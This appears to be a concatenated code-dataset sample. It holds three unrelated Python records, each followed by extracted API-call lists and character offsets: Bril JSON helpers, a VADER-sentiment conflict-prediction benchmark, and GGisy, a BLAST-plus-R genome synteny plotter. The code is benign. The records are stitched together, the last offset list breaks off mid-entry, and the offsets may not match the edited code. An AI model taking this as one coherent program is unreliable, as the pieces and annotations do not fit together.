def bril2txt():
    """Read Bril JSON from stdin and pretty-print the text format."""
    prog = json.load(sys.stdin)
    print_prog(prog)
def loadbril():
    """Read Bril JSON from stdin, resolve its imports and print the
    merged program.

    ``unroll_imports`` already returns a JSON-formatted *string* (with
    indent=2 and sorted keys); the original re-encoded that string with
    ``json.dumps``, printing a double-encoded quoted string instead of
    the program JSON.
    """
    print(unroll_imports(json.load(sys.stdin)))
| [
"lark.Lark",
"json.dumps",
"sys.stderr.flush",
"sys.exit",
"json.load",
"sys.stdin.read"
] | [((3352, 3370), 'lark.Lark', 'lark.Lark', (['GRAMMAR'], {}), '(GRAMMAR)\n', (3361, 3370), False, 'import lark\n'), ((3739, 3781), 'json.dumps', 'json.dumps', (['data'], {'indent': '(2)', 'sort_keys': '(True)'}), '(data, indent=2, sort_keys=True)\n', (3749, 3781), False, 'import json\n'), ((3860, 3902), 'json.dumps', 'json.dumps', (['prog'], {'indent': '(2)', 'sort_keys': '(True)'}), '(prog, indent=2, sort_keys=True)\n', (3870, 3902), False, 'import json\n'), ((6239, 6259), 'json.load', 'json.load', (['sys.stdin'], {}), '(sys.stdin)\n', (6248, 6259), False, 'import json\n'), ((6183, 6199), 'sys.stdin.read', 'sys.stdin.read', ([], {}), '()\n', (6197, 6199), False, 'import sys\n'), ((4389, 4407), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (4405, 4407), False, 'import sys\n'), ((4421, 4432), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4429, 4432), False, 'import sys\n'), ((6319, 6339), 'json.load', 'json.load', (['sys.stdin'], {}), '(sys.stdin)\n', (6328, 6339), False, 'import json\n')] |
import warnings
import numpy as np
from tabulate import tabulate
from collections import Counter
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.metrics import precision_score, recall_score, f1_score
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
def get_sentiment(documents, document_ids):
    """
    Map each document ID to its VADER polarity-score dict.

    Input - parallel sequences of documents and their IDs
            (tweet IDs / message hashes etc.)
    Returns - dict {document_id: polarity scores}; when an ID appears
    more than once, the first document seen wins.

    Generic over the document source (tweets, news articles, ...).
    """
    analyzer = SentimentIntensityAnalyzer()
    sentiment_by_id = {}
    for document, document_id in zip(documents, document_ids):
        if document_id not in sentiment_by_id:
            sentiment_by_id[document_id] = analyzer.polarity_scores(document)
    return sentiment_by_id
def make_predictions(location_features_dict, labels, model=None, permute=False, lead_days=2, days_window=5):
    """
    Train and evaluate a classifier per location and print a metrics table.

    Input -
        location_features_dict - dict mapping location -> feature rows
        labels - label dict generated from process_acled_csv(..)
        model - sklearn-style classifier to benchmark
                (default: ExtraTreesClassifier)
        permute - permute the data before the train-test split
        lead_days, days_window - trailing feature rows dropped so X
                matches the label length
    Returns - None
    """
    # Table for presenting on tabulate.
    result_table = []
    # Suppress divide-by-zero warnings from the metric computations.
    warnings.filterwarnings("ignore")
    # Only evaluate locations present in both features and labels
    # (sorted for clarity/reproducibility).
    common_locations = sorted(
        set(location_features_dict.keys()) & set(labels.keys()))
    for common_location in common_locations:
        # Get data and labels.
        X = np.array(location_features_dict[common_location])
        y = np.array(labels[common_location])
        # Eliminate trailing days to match labels.shape.
        X = X[:-(lead_days + days_window)]
        # Permute randomly if specified.
        if permute:
            p = np.random.permutation(len(X))
            X, y = X[p], y[p]
        # Split data into train & test - 75% & 25%.
        split = int(0.75 * len(X))
        xtrain, ytrain = X[:split], y[:split]
        xtest, ytest = X[split:], y[split:]
        if model is None:
            # Default model. (The original referenced ``xgboost``, which
            # is never imported in this module and would raise NameError;
            # ExtraTreesClassifier is imported at the top of the file and
            # serves as the default instead.)
            model = ExtraTreesClassifier(n_estimators=200, n_jobs=-1)
        # Fit the train data and make predictions.
        model.fit(xtrain, ytrain)
        ypred = model.predict(xtest)
        # Compute metrics.
        train_acc = model.score(xtrain, ytrain)
        test_acc = model.score(xtest, ytest)
        precision = precision_score(ytest, ypred)
        recall = recall_score(ytest, ypred)
        f1 = f1_score(ytest, ypred)
        # Add row to result_table (last column: fraction of positives).
        result_row = [
            common_location,
            np.round(train_acc, 2), np.round(test_acc, 2),
            np.round(precision, 2), np.round(recall, 2),
            np.round(f1, 2), np.round(np.sum(y) / len(y), 2)
        ]
        result_table.append(result_row)
    # Column-wise averages over the numeric part of the table.
    result_table_copy = (np.array(result_table)[:, 1:]).astype(np.float32)
    averages = np.round(np.mean(result_table_copy, axis=0), 2)
    # NOTE(review): x[-2] is the F1 column, not test accuracy — the
    # original comment said "sort by test accuracy"; behaviour preserved.
    result_table = sorted(result_table, key=lambda x: -x[-2])
    # Append the averages row.
    result_table.append(["Average"] + averages.tolist())
    # Header for table.
    header = ["Location", "Train Accuracy", "Test Accuracy",
              "Precision", "Recall", "F1 Score", "+'s in data"]
    # Print tabulated result.
    print(tabulate(result_table,
                   tablefmt="pipe",
                   stralign="center",
                   headers=header))
    # Restore default warning behaviour.
    warnings.filterwarnings("default")
    return
def get_features(date_dict):
    """
    Build one feature row per date from a dict of per-date document frames.

    Each row is: [document count, mean pos, mean neg, mean neu,
    mean compound, count of documents with neg > 0]. Dates whose value
    is None get a row of six zeros.
    """
    features = []
    for date, docs in date_dict.items():
        if docs is None:
            # No documents for this date: zero-row placeholder.
            features.append([0] * 6)
            continue
        means = docs.mean()
        row = [
            len(docs),
            means['pos'], means['neg'], means['neu'], means['compound'],
            len(docs[docs['neg'] > 0]),
        ]
        features.append(row)
    return features
| [
"vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer",
"numpy.mean",
"sklearn.metrics.f1_score",
"tabulate.tabulate",
"sklearn.metrics.precision_score",
"sklearn.metrics.recall_score",
"numpy.array",
"numpy.sum",
"warnings.filterwarnings",
"numpy.round"
] | [((699, 727), 'vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer', 'SentimentIntensityAnalyzer', ([], {}), '()\n', (725, 727), False, 'from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n'), ((1592, 1625), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (1615, 1625), False, 'import warnings\n'), ((4108, 4142), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""default"""'], {}), "('default')\n", (4131, 4142), False, 'import warnings\n'), ((2846, 2875), 'sklearn.metrics.precision_score', 'precision_score', (['ytest', 'ypred'], {}), '(ytest, ypred)\n', (2861, 2875), False, 'from sklearn.metrics import precision_score, recall_score, f1_score\n'), ((2893, 2919), 'sklearn.metrics.recall_score', 'recall_score', (['ytest', 'ypred'], {}), '(ytest, ypred)\n', (2905, 2919), False, 'from sklearn.metrics import precision_score, recall_score, f1_score\n'), ((2933, 2955), 'sklearn.metrics.f1_score', 'f1_score', (['ytest', 'ypred'], {}), '(ytest, ypred)\n', (2941, 2955), False, 'from sklearn.metrics import precision_score, recall_score, f1_score\n'), ((3508, 3542), 'numpy.mean', 'np.mean', (['result_table_copy'], {'axis': '(0)'}), '(result_table_copy, axis=0)\n', (3515, 3542), True, 'import numpy as np\n'), ((3938, 4012), 'tabulate.tabulate', 'tabulate', (['result_table'], {'tablefmt': '"""pipe"""', 'stralign': '"""center"""', 'headers': 'header'}), "(result_table, tablefmt='pipe', stralign='center', headers=header)\n", (3946, 4012), False, 'from tabulate import tabulate\n'), ((2020, 2031), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (2028, 2031), True, 'import numpy as np\n'), ((2033, 2044), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (2041, 2044), True, 'import numpy as np\n'), ((3075, 3097), 'numpy.round', 'np.round', (['train_acc', '(2)'], {}), '(train_acc, 2)\n', (3083, 3097), True, 'import numpy as np\n'), ((3099, 3120), 'numpy.round', 'np.round', (['test_acc', '(2)'], {}), 
'(test_acc, 2)\n', (3107, 3120), True, 'import numpy as np\n'), ((3144, 3166), 'numpy.round', 'np.round', (['precision', '(2)'], {}), '(precision, 2)\n', (3152, 3166), True, 'import numpy as np\n'), ((3168, 3187), 'numpy.round', 'np.round', (['recall', '(2)'], {}), '(recall, 2)\n', (3176, 3187), True, 'import numpy as np\n'), ((3211, 3226), 'numpy.round', 'np.round', (['f1', '(2)'], {}), '(f1, 2)\n', (3219, 3226), True, 'import numpy as np\n'), ((3434, 3456), 'numpy.array', 'np.array', (['result_table'], {}), '(result_table)\n', (3442, 3456), True, 'import numpy as np\n'), ((3237, 3246), 'numpy.sum', 'np.sum', (['y'], {}), '(y)\n', (3243, 3246), True, 'import numpy as np\n')] |
from __future__ import with_statement
# ==============================================================================
# GGisy (python v2.7)
#
# Author: <NAME> (<EMAIL>)
# Bugs and errors: https://github.com/Sanrrone/GGisy/issues
#
# Please type "python GGisy.py -h" for usage help
#
# ==============================================================================
__author__ = '<NAME> (<EMAIL>)'
__version__ = '1.0'
import sys, os, subprocess, glob, csv, collections
from optparse import OptionParser
from operator import itemgetter
from Bio import SeqIO
def main():
    """Parse the GGisy command line, validate the input files and the
    required external binaries, and return the settings as a named
    tuple (genome1, genome2, alignL, evalue, Identity, threads,
    blastout, cleanf)."""
    parser = OptionParser(usage = "Usage: python GGisy.py -r genome1.fna -q genome2.fna")
    parser.add_option("-r","--reference",dest="genome1",help="First genome to be used as reference", default=None)
    parser.add_option("-q","--query",dest="genome2",help="Second genome to be used as query against the first genome (-r)", default=None)
    parser.add_option("-l","--alignmentLength",dest="alignL",help="Aligment length cutoff in blast output [default: 1000]",default=1000)
    parser.add_option("-e","--evalue",dest="evalue",help="E-value cutoff for blastn search [default: 1e-3]",default=1e-3)
    parser.add_option("-i","--identity",dest="Identity",help="Identity cutoff on the blastn alignment to consider the region [default: 50]",default=50)
    parser.add_option("-t","--threads",dest="Threads",help="Number of threads to be used for blast [default: 4]",default=4)
    parser.add_option("-b","--blastout",dest="Blastout",help="Blast output file to be used instead doing it [default: none]",default=None)
    parser.add_option("-c","--clean",dest="clean",help="clean files after execution [default: True]",default=True)
    (options,args) = parser.parse_args()
    # NOTE(review): str(None) yields the truthy string "None", so the
    # "not genome1" checks below only fire indirectly via the
    # os.path.isfile test — confirm the intended error message.
    genome1 = str(options.genome1)
    genome2 = str(options.genome2)
    alignL= int(options.alignL)
    evalue= str(options.evalue)
    Identity= int(options.Identity)
    threads= str(options.Threads) #for subcallproccess must be str()
    blastout= options.Blastout #dont cast to str
    # NOTE(review): any string passed via -c is truthy ("-c False" still
    # evaluates True) — confirm whether a store_true-style flag was meant.
    cleanf=options.clean
    #check variables
    if not genome1 or genome1 is None:
        print("* No genome was provided (-g1), use -h for help")
        sys.exit()
    else:
        if os.path.isfile(genome1) == False:
            print("*",genome1," doesn't exist")
            sys.exit()
    if not genome2 or genome2 is None:
        print("* its mandatory provide 2 genomes (-g2), use -h for help")
        sys.exit()
    else:
        if os.path.isfile(genome2) == False:
            print("* ",genome2," doesn't exist")
            sys.exit()
    # A pre-computed blast output, when given, must exist on disk.
    if blastout != None:
        if os.path.isfile(blastout) == False:
            print("* ", blastout, "not found, check if file exist or let the program do the blast omiting this option (-b)")
            sys.exit()
    # Required external tools must be reachable on PATH.
    blastBIN=which("blastn")
    if blastBIN == None:
        print("No blastn was found, install it before continue (make sure is in your $PATH)")
        sys.exit()
    makeblastBIN=which("makeblastdb")
    if makeblastBIN == None:
        print("No makeblastdb was found, install it from blast+ (make sure is in your $PATH)")
        sys.exit()
    rscriptBIN=which("Rscript")
    if rscriptBIN == None:
        print("No Rscript was found, make sure is in your $PATH")
        sys.exit()
    # Bundle the validated settings for the caller.
    Inputs = collections.namedtuple('Inputs', ['v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8'])
    I = Inputs(genome1, genome2, alignL, evalue, Identity, threads, blastout, cleanf)
    return I
def which(program):
    """Return the full path of *program* if it is an executable file,
    else None. A bare name is searched along $PATH; a name containing a
    directory component is checked directly."""
    def executable(candidate):
        return os.path.isfile(candidate) and os.access(candidate, os.X_OK)

    directory, _ = os.path.split(program)
    if directory:
        return program if executable(program) else None
    for entry in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(entry.strip('"'), program)
        if executable(candidate):
            return candidate
    return None
def blasting(genome1, genome2, evalue, threads):
    """Build a blast database ("ref") from genome1 and run blastn with
    genome2 against it. Writes tabular (outfmt 6) hits to ``tmp.tsv``
    and returns that file name."""
    makedb_cmd = ["makeblastdb", "-in", genome1, "-input_type", "fasta",
                  "-dbtype", "nucl", "-out", "ref"]
    blastn_cmd = ["blastn", "-query", genome2, "-db", "ref",
                  "-evalue", evalue, "-outfmt", "6", "-strand", "both",
                  "-num_threads", threads, "-out", "tmp.tsv"]
    subprocess.call(makedb_cmd)
    subprocess.call(blastn_cmd)
    return str("tmp.tsv")
def filterBlastOutput(blastout, alignL, evalue, identity):
    """Filter blastn outfmt-6 rows into ``synteny.tsv``.

    Keeps rows whose alignment length (column 4) is >= alignL and whose
    percent identity (column 3) is >= identity, writing
    qseqid, sseqid, pident, qstart, qend, sstart, send per kept row.
    The ``evalue`` parameter is unused here (the cutoff is applied by
    blastn itself) but kept for interface compatibility.

    The original opened the output file without ever closing it; both
    files are now managed with ``with`` blocks.
    """
    with open("synteny.tsv", 'w') as parsed, open(blastout) as tsvfile:
        for line in csv.reader(tsvfile, delimiter="\t"):
            if int(line[3]) >= alignL and float(line[2]) >= float(identity):
                parsed.write("\t".join(map(str, line[0:3] + line[6:10])) + "\n")
def parsingGenomes(genome):
    """Write a "<name>\t1\t<length>" line per FASTA record of *genome*
    into ``<basename>_info.tsv`` (in the working directory) and return
    that file name.

    The record name is the first whitespace-delimited token after '>',
    matching what Bio.SeqIO reports as the record id. The original
    called ``PARSED.close`` without parentheses, so the output file was
    never closed; this version uses ``with`` blocks and parses the
    FASTA with the standard library only.
    """
    gname = genome.split('/')[-1]
    outname = str(gname + "_info.tsv")
    with open(outname, 'w') as parsed, open(genome) as fasta:
        name = None
        length = 0
        for line in fasta:
            line = line.rstrip("\n")
            if line.startswith(">"):
                # Flush the previous record before starting a new one.
                if name is not None:
                    parsed.write("%s\t1\t%s\n" % (name, length))
                name = line[1:].split()[0]
                length = 0
            elif name is not None:
                length += len(line.strip())
        if name is not None:
            parsed.write("%s\t1\t%s\n" % (name, length))
    return outname
def handleR(conn, reference, query, alignL):
plotstep=open("handle.R", 'w')
plotstep.write("""rm(list=ls());
library(OmicCircos)
library(RColorBrewer)
library(varhandle)
args<-commandArgs()
handlefile<-as.character(args[6])
refname<-as.character(args[7])
queryname<-as.character(args[8])
filterl<-as.numeric(args[9])
handle<-read.table(handlefile,sep = "\\t",stringsAsFactors = F,check.names = F)
ref<-read.table(refname,sep = "\\t",stringsAsFactors = F,check.names = F)
query<-read.table(queryname,sep = "\\t", stringsAsFactors = F,check.names = F)
rownames(ref)<-ref$V1
rownames(query)<-query$V1
qryUniq<-unique(sort(handle$V1))
refUniq<-unique(sort(handle$V2))
ref<-ref[refUniq,]
ref<-ref[with(ref, order(-V3, V1)), ]
query<-query[qryUniq,]
query<-query[with(query, order(+V3, V1)), ]
data<-rbind(ref,query)
refname<-unlist(strsplit(refname,"_info.tsv"))[1]
queryname<-unlist(strsplit(queryname,"_info.tsv"))[1]
lowId<-min(handle$V3)
fhand<-handle[handle$V6<handle$V7,]
rhand<-handle[handle$V6>handle$V7,]
linkf<-data.frame(seg1=fhand$V1, start1=fhand$V4, end1=fhand$V5, seg2=fhand$V2, start2=fhand$V6, end2=fhand$V7, stringsAsFactors = F)
linkr<-data.frame(seg1=rhand$V1, start1=rhand$V4, end1=rhand$V5, seg2=rhand$V2, start2=rhand$V6, end2=rhand$V7, stringsAsFactors = F)
#fix reverse positions
for(i in 1:nrow(linkr)){
contign<-linkr[i,4]
contigl<-ref[contign,3]
linkr[i,5]<- contigl-linkr[i,5]+1
linkr[i,6]<- contigl-linkr[i,6]+1
}
data["V5"]<-data["V4"]<-1
colnames(data)<- c("chr", "start", "end","V4","V5")
tocir <- segAnglePo(data, seg=data$chr)
gl<-sum(data$end)+nrow(data)
maxangr<-270+(350/gl)*sum(ref$V3)
spacer<-maxangr/(maxangr-270)/nrow(ref)
for(i in 1:nrow(ref)){
#358 is the total angles (aviable) for all
tocir[i,"angle.end"]<-as.character(as.numeric(tocir[i,"angle.start"]) + (350/gl)*as.numeric(tocir[i,7]))
tocir[i+1,"angle.start"]<-as.character(as.numeric(tocir[i,"angle.end"])+spacer)
}
tocir[i+1,"angle.start"]<-as.character(as.numeric(tocir[i+1,"angle.start"])+2.5)
tocir[i+1,"angle.end"]<-as.character(as.numeric(tocir[i+1,"angle.start"]) + (350/gl)*as.numeric(tocir[i+1,7]))
maxangq<-628-maxangr
spacer<-628/maxangq/nrow(query)
if(nrow(ref)+2>=nrow(tocir)){
i<-nrow(tocir)
tocir[i,"angle.start"]<-as.character(as.numeric(tocir[i-1,"angle.end"])+spacer)
tocir[i,"angle.end"]<-as.character(628)
}else{
for(i in (nrow(ref)+2):nrow(tocir)-1){
#358 is the total angles (aviable) for all
tocir[i,"angle.end"]<-as.character(as.numeric(tocir[i,"angle.start"]) + (350/gl)*as.numeric(tocir[i,7]))
tocir[i+1,"angle.start"]<-as.character(as.numeric(tocir[i,"angle.end"])+spacer)
}
}
refang<-as.numeric(tocir[1:nrow(ref),2])
qryang<-as.numeric(tocir[(nrow(ref)+1):(nrow(ref)+nrow(query)),2])
maxangr<-max(refang)
maxangq<-max(qryang)
faketocir <- tocir
faketocir[,1]<-""
maxangr<-max(refang)
for(i in 1:nrow(tocir)){
if(270+(maxangr-270)/2<as.numeric(tocir[i,2])){
break
}
}
faketocir[i,1]<-refname
maxangq<-max(qryang)
for(i in 1:nrow(tocir)){
if(maxangr+(maxangq-maxangr)/2<as.numeric(tocir[i,2])){
break
}
}
faketocir[i,1]<-queryname
colors<-rev(colorRampPalette(rev(brewer.pal(n = 7, name = "RdYlBu")))(20))
delta<-(100-lowId)/20
scaleColors<- function(x){
cArray<-c()
for(id in x){
for(i in 1:20){
if(id>=100-(delta*i)){
break
}
}
cArray<-c(cArray,colors[i])
}
return(cArray)
}
addalpha <- function(col, alpha=1){
if(missing(col))
stop("Please provide a vector of colours.")
apply(sapply(col, col2rgb)/255, 2,
function(x)
rgb(x[1], x[2], x[3], alpha=alpha))
}
black<-addalpha("#000000",0.7)
colors<-addalpha(colors,1)
try({
linkf[,"colors"]<-addalpha(scaleColors(fhand$V3),1)
},silent = T)
try({
linkr[,"colors"]<-addalpha(scaleColors(rhand$V3),1)
},silent = T)
pdf(file="synteny.pdf", width = 10, height =10)
if(nrow(data)<=20){
par(mar=c(2,2,2,2))
xorigin=700
yorigin=1000
plot(c(0,2000), c(0,2000), type="n", axes=FALSE, xlab="", ylab="", main="")
circos(R=450, cir=tocir, W=10,type="chr", print.chr.lab=T, scale=F,xc = xorigin,yc = yorigin,
col = c(rep("dark blue",nrow(ref)),rep("#FEE496",nrow(query))),cex = 5)
if(nrow(linkf)>0){
circos(R=440, cir=tocir, mapping=linkf , type="link.pg", lwd=0.5, col=linkf$colors,xc = xorigin,yc = yorigin)
}
if(nrow(linkr)>0){
circos(R=440, cir=tocir, mapping=linkr , type="link.pg", lwd=0.5, col=linkr$colors,xc = xorigin,yc = yorigin)
newlinkr<-linkr
newlinkr$start1<-newlinkr$start1+as.integer((newlinkr$end1-newlinkr$start1)/2)+1
newlinkr$start2<-newlinkr$start2+as.integer((newlinkr$end2-newlinkr$start2)/2)-1
circos(R=440, cir=tocir, W=10, mapping=newlinkr , type="link", lwd=0.6, col=black,xc = xorigin,yc = yorigin)
}
legend(x = 1500, y=1700, legend = c(refname,queryname),
ncol = 1, cex = 0.8, bty="n",
fill=c("dark blue","#FEE496"),
border = c("dark blue","#FEE496"),text.width=c(0.5,0.5),
title="Sequences")
legend(x = 1430, y=1500, legend = c(paste("Reference: ", nrow(ref), " (", sum(ref$V3), " bp)", sep = ""), paste("Query: ",nrow(query), " (", sum(query$V3), " bp)", sep="")),
ncol = 1, cex = 0.8, bty="n",
fill=c("dark blue","#FEE496"),
border = c("dark blue","#FEE496"),text.width=c(0.5,0.5),
title=paste("Contigs align >= ", filterl, " bp", sep=""))
legend(x = 1520, y=1300, legend = c("Forward","Reverse"),lty = c(0,1),merge=T,seg.len = 0.6,
ncol = 1, cex = 0.8, bty="n",
fill="white",
border = "black",text.width=c(0.5,0.5),
title="Strand Match\n(on reference)")
legend(x = 1505, y=1100, legend = c("100","","","","","","","","","",(100-lowId)/2 + lowId,"","","","","","","","",lowId),
ncol = 1, cex = 0.8, bty="n",
fill=colors,
border = colors,
y.intersp = 0.5,
x.intersp = 0.5,text.width=c(0.5,0.5),
title="Identity percent\n")
}else{
par(mar=c(2,2,2,2))
xorigin=750
yorigin=550
plot(c(0,1500), c(0,1500), type="n", axes=FALSE, xlab="", ylab="", main="")
circos(R=450, cir=faketocir, W=10,type="chr", print.chr.lab=T, scale=F,xc = xorigin,yc = yorigin,
col = "white")
circos(R=410, cir=tocir, W=10,type="chr", print.chr.lab=F, scale=F,xc = xorigin,yc = yorigin,
col = c(rep("dark blue",nrow(ref)),rep("#FEE496",nrow(query))),cex = 5)
if(nrow(linkf)>0){
highlightr <- c(420, 450, tocir[1,1], 1, tocir[nrow(ref),1], tocir[nrow(ref),7], "dark blue", NA)
circos(cir=tocir, mapping=highlightr, type="hl",xc = xorigin,yc = yorigin)
circos(R=400, cir=tocir, mapping=linkf , type="link.pg", lwd=0.5, col=linkf$colors,xc = xorigin,yc = yorigin)
}
if(nrow(linkr)>0){
highlightq <- c(420, 450, query[1,1], 1, query[nrow(query),1], query[nrow(query),3], "#FEE496", NA)
circos(cir=tocir, mapping=highlightq, type="hl",xc = xorigin,yc = yorigin)
circos(R=400, cir=tocir, mapping=linkr , type="link.pg", lwd=0.5, col=linkr$colors,xc = xorigin,yc = yorigin)
newlinkr<-linkr
newlinkr$start1<-newlinkr$start1+as.integer((newlinkr$end1-newlinkr$start1)/2)+1
newlinkr$start2<-newlinkr$start2+as.integer((newlinkr$end2-newlinkr$start2)/2)-1
circos(R=400, cir=tocir, W=10, mapping=newlinkr , type="link", lwd=0.3, col=black,xc = xorigin,yc = yorigin)
}
legend(x = 210, y=1500, legend = c(paste("Reference: ", nrow(ref), " (", sum(ref$V3), " bp)", sep = ""), paste("Query: ",nrow(query), " (", sum(query$V3), " bp)", sep="")),
ncol = 1, cex = 0.8, bty="n",
fill=c("dark blue","#FEE496"),
border = c("dark blue","#FEE496"),text.width=c(0.5,0.5),
title=paste("Contigs align >= ", filterl, " bp", sep=""))
legend(x = 270, y=1300, legend = c("Forward","Reverse"),lty = c(0,1),merge=T,seg.len = 0.6,
ncol = 1, cex = 0.8, bty="n",
fill="white",
border = "black",text.width=c(0.5,0.5),
title="Strand Match\\n(on reference)")
legend(x = 990, y=1500, legend = c("100","","","","","","","","","",(100-lowId)/2 + lowId,"","","","","","","","",lowId),
ncol = 1, cex = 0.8, bty="n",
fill=colors,
border = colors,
y.intersp = 0.5,
x.intersp = 0.5,text.width=c(0.5,0.5),
title="Identity percent\\n")
}
dev.off()""")
plotstep.close()
subprocess.call(["Rscript", "handle.R", conn, reference, query, str(alignL), "--vanilla"])
def cleanfiles(ginfo1, ginfo2):
if os.path.isfile("tmp.tsv"):
os.remove("tmp.tsv")
if os.path.isfile("ref.nin"):
os.remove("ref.nin")
if os.path.isfile("ref.nsq"):
os.remove("ref.nsq")
if os.path.isfile("ref.nhr"):
os.remove("ref.nhr")
if os.path.isfile("handle.R"):
os.remove("handle.R")
if os.path.isfile(ginfo1):
os.remove(ginfo1)
if os.path.isfile(ginfo2):
os.remove(ginfo2)
if __name__ == '__main__':
mainV=main()
blastout=mainV.v7
if blastout is None:
blastout=blasting(genome1=mainV.v1, genome2=mainV.v2, evalue=mainV.v4, threads=mainV.v6)
filterBlastOutput(blastout=blastout, alignL=mainV.v3, evalue=mainV.v4, identity=mainV.v5)
ref=parsingGenomes(genome=mainV.v1)
que=parsingGenomes(genome=mainV.v2)
handleR(conn="synteny.tsv",reference=ref, query=que, alignL=mainV.v3)
if mainV.v8 == True:
cleanfiles(ref,que)
sys.exit()
| [
"collections.namedtuple",
"os.access",
"os.path.join",
"optparse.OptionParser",
"os.path.split",
"os.path.isfile",
"subprocess.call",
"sys.exit",
"csv.reader",
"os.remove"
] | [((591, 665), 'optparse.OptionParser', 'OptionParser', ([], {'usage': '"""Usage: python GGisy.py -r genome1.fna -q genome2.fna"""'}), "(usage='Usage: python GGisy.py -r genome1.fna -q genome2.fna')\n", (603, 665), False, 'from optparse import OptionParser\n'), ((3104, 3190), 'collections.namedtuple', 'collections.namedtuple', (['"""Inputs"""', "['v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8']"], {}), "('Inputs', ['v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7',\n 'v8'])\n", (3126, 3190), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3442, 3464), 'os.path.split', 'os.path.split', (['program'], {}), '(program)\n', (3455, 3464), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3784, 3894), 'subprocess.call', 'subprocess.call', (["['makeblastdb', '-in', genome1, '-input_type', 'fasta', '-dbtype', 'nucl',\n '-out', 'ref']"], {}), "(['makeblastdb', '-in', genome1, '-input_type', 'fasta',\n '-dbtype', 'nucl', '-out', 'ref'])\n", (3799, 3894), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3892, 4058), 'subprocess.call', 'subprocess.call', (["['blastn', '-query', genome2, '-db', 'ref', '-evalue', evalue, '-outfmt',\n '6', '-strand', 'both', '-num_threads', threads, '-out', 'tmp.tsv']"], {}), "(['blastn', '-query', genome2, '-db', 'ref', '-evalue',\n evalue, '-outfmt', '6', '-strand', 'both', '-num_threads', threads,\n '-out', 'tmp.tsv'])\n", (3907, 4058), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13433, 13458), 'os.path.isfile', 'os.path.isfile', (['"""tmp.tsv"""'], {}), "('tmp.tsv')\n", (13447, 13458), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13487, 13512), 'os.path.isfile', 'os.path.isfile', (['"""ref.nin"""'], {}), "('ref.nin')\n", (13501, 13512), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13541, 13566), 'os.path.isfile', 'os.path.isfile', (['"""ref.nsq"""'], {}), "('ref.nsq')\n", (13555, 13566), False, 'import sys, os, subprocess, glob, csv, 
collections\n'), ((13595, 13620), 'os.path.isfile', 'os.path.isfile', (['"""ref.nhr"""'], {}), "('ref.nhr')\n", (13609, 13620), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13649, 13675), 'os.path.isfile', 'os.path.isfile', (['"""handle.R"""'], {}), "('handle.R')\n", (13663, 13675), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13705, 13727), 'os.path.isfile', 'os.path.isfile', (['ginfo1'], {}), '(ginfo1)\n', (13719, 13727), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13753, 13775), 'os.path.isfile', 'os.path.isfile', (['ginfo2'], {}), '(ginfo2)\n', (13767, 13775), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((14256, 14266), 'sys.exit', 'sys.exit', ([], {}), '()\n', (14264, 14266), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2131, 2141), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2139, 2141), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2348, 2358), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2356, 2358), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2791, 2801), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2799, 2801), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2955, 2965), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2963, 2965), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3082, 3092), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3090, 3092), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((4238, 4273), 'csv.reader', 'csv.reader', (['tsvfile'], {'delimiter': '"""\t"""'}), "(tsvfile, delimiter='\\t')\n", (4248, 4273), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13462, 13482), 'os.remove', 'os.remove', (['"""tmp.tsv"""'], {}), "('tmp.tsv')\n", (13471, 13482), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13516, 13536), 'os.remove', 'os.remove', (['"""ref.nin"""'], {}), "('ref.nin')\n", (13525, 13536), False, 'import sys, os, 
subprocess, glob, csv, collections\n'), ((13570, 13590), 'os.remove', 'os.remove', (['"""ref.nsq"""'], {}), "('ref.nsq')\n", (13579, 13590), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13624, 13644), 'os.remove', 'os.remove', (['"""ref.nhr"""'], {}), "('ref.nhr')\n", (13633, 13644), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13679, 13700), 'os.remove', 'os.remove', (['"""handle.R"""'], {}), "('handle.R')\n", (13688, 13700), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13731, 13748), 'os.remove', 'os.remove', (['ginfo1'], {}), '(ginfo1)\n', (13740, 13748), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13779, 13796), 'os.remove', 'os.remove', (['ginfo2'], {}), '(ginfo2)\n', (13788, 13796), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2154, 2177), 'os.path.isfile', 'os.path.isfile', (['genome1'], {}), '(genome1)\n', (2168, 2177), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2230, 2240), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2238, 2240), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2371, 2394), 'os.path.isfile', 'os.path.isfile', (['genome2'], {}), 